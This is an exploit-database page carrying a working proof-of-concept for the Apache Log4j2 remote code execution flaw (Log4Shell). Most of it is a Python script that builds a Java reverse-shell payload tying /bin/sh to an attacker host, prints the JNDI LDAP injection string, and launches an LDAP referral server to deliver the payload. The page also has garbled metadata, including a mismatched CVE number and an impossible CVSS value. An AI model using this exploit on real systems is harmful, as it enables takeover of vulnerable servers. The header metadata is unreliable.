Apache Log4j2 2.14.1 Remote Code Execution

🗓️ 14 Dec 2021 00:00:00Reported by z9fr, kozmer, svmorrisType

packetstorm🔗 packetstormsecurity.com👁 566 Views

Apache Log4j2 2.14.1 Remote Code Execution (RCE) CVE-2021-4422

Reporter	Title	Published	Views	Family All 1396
GithubExploit	Exploit for Uncontrolled Resource Consumption in Siemens 6Bk1602-0Aa12-0Tp0_Firmware	17 Dec 202108:32	–	githubexploit
GithubExploit	Exploit for Uncontrolled Resource Consumption in Siemens 6Bk1602-0Aa12-0Tp0_Firmware	11 Dec 202116:08	–	githubexploit
GithubExploit	Exploit for Uncontrolled Resource Consumption in Siemens 6Bk1602-0Aa12-0Tp0_Firmware	15 Dec 202113:14	–	githubexploit
GithubExploit	Exploit for Uncontrolled Resource Consumption in Siemens 6Bk1602-0Aa12-0Tp0_Firmware	11 Mar 202212:43	–	githubexploit
GithubExploit	Exploit for Uncontrolled Resource Consumption in Siemens 6Bk1602-0Aa12-0Tp0_Firmware	19 Mar 202615:19	–	githubexploit
GithubExploit	Exploit for Uncontrolled Resource Consumption in Siemens 6Bk1602-0Aa12-0Tp0_Firmware	7 Mar 202410:04	–	githubexploit
GithubExploit	Exploit for Uncontrolled Resource Consumption in Siemens 6Bk1602-0Aa12-0Tp0_Firmware	12 Dec 202113:59	–	githubexploit
GithubExploit	Exploit for Uncontrolled Resource Consumption in Siemens 6Bk1602-0Aa12-0Tp0_Firmware	12 Dec 202111:26	–	githubexploit
GithubExploit	Exploit for Uncontrolled Resource Consumption in Siemens 6Bk1602-0Aa12-0Tp0_Firmware	12 Dec 202115:29	–	githubexploit
GithubExploit	Exploit for Uncontrolled Resource Consumption in Siemens 6Bk1602-0Aa12-0Tp0_Firmware	12 Dec 202112:27	–	githubexploit

`# Exploit Title: Apache Log4j 2 - Remote Code Execution (RCE)  
# Date: 11/12/2021  
# Exploit Authors: kozmer, z9fr, svmorris  
# Vendor Homepage: https://logging.apache.org/log4j/2.x/  
# Software Link: https://github.com/apache/logging-log4j2  
# Version: versions 2.0-beta-9 and 2.14.1.  
# Tested on: Linux  
# CVE: CVE-2021-44228  
# Github repo: https://github.com/kozmer/log4j-shell-poc  
  
import subprocess  
import os  
import sys  
  
javaver = subprocess.call(['./jdk1.8.0_20/bin/java', '-version']) #stderr=subprocess.DEVNULL, stdout=subprocess.DEVNULL)  
print("\n")  
  
userip = input("[+] Enter IP for LDAPRefServer & Shell: ")  
userport = input("[+] Enter listener port for LDAPRefServer: ")  
lport = input("[+] Set listener port for shell: ")  
  
def payload():  
  
javapayload = ("""  
  
import java.io.IOException;  
import java.io.InputStream;  
import java.io.OutputStream;  
import java.net.Socket;  
  
public class Exploit {  
  
public Exploit() throws Exception {  
String host="%s";  
int port=%s;  
String cmd="/bin/sh";  
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();  
Socket s=new Socket(host,port);  
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();  
OutputStream po=p.getOutputStream(),so=s.getOutputStream();  
while(!s.isClosed()) {  
while(pi.available()>0)  
so.write(pi.read());  
while(pe.available()>0)  
so.write(pe.read());  
while(si.available()>0)  
po.write(si.read());  
so.flush();  
po.flush();  
Thread.sleep(50);  
try {  
p.exitValue();  
break;  
}  
catch (Exception e){  
}  
};  
p.destroy();  
s.close();  
}  
}  
  
""") % (userip,lport)  
  
f = open("Exploit.java", "w")  
f.write(javapayload)  
f.close()  
  
os.system('./jdk1.8.0_20/bin/javac Exploit.java')  
  
sendme = ("${jndi:ldap://%s:1389/a}") % (userip)  
print("[+] Send me: "+sendme+"\n")  
  
def marshalsec():  
os.system("./jdk1.8.0_20/bin/java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer  
http://{}:{}/#Exploit".format  
(userip, userport))  
  
if __name__== "__main__":  
payload()  
marshalsec()  
  
`

14 Dec 2021 00:00Current

CVSS 29.3

CVSS 3.110

EPSS0.94358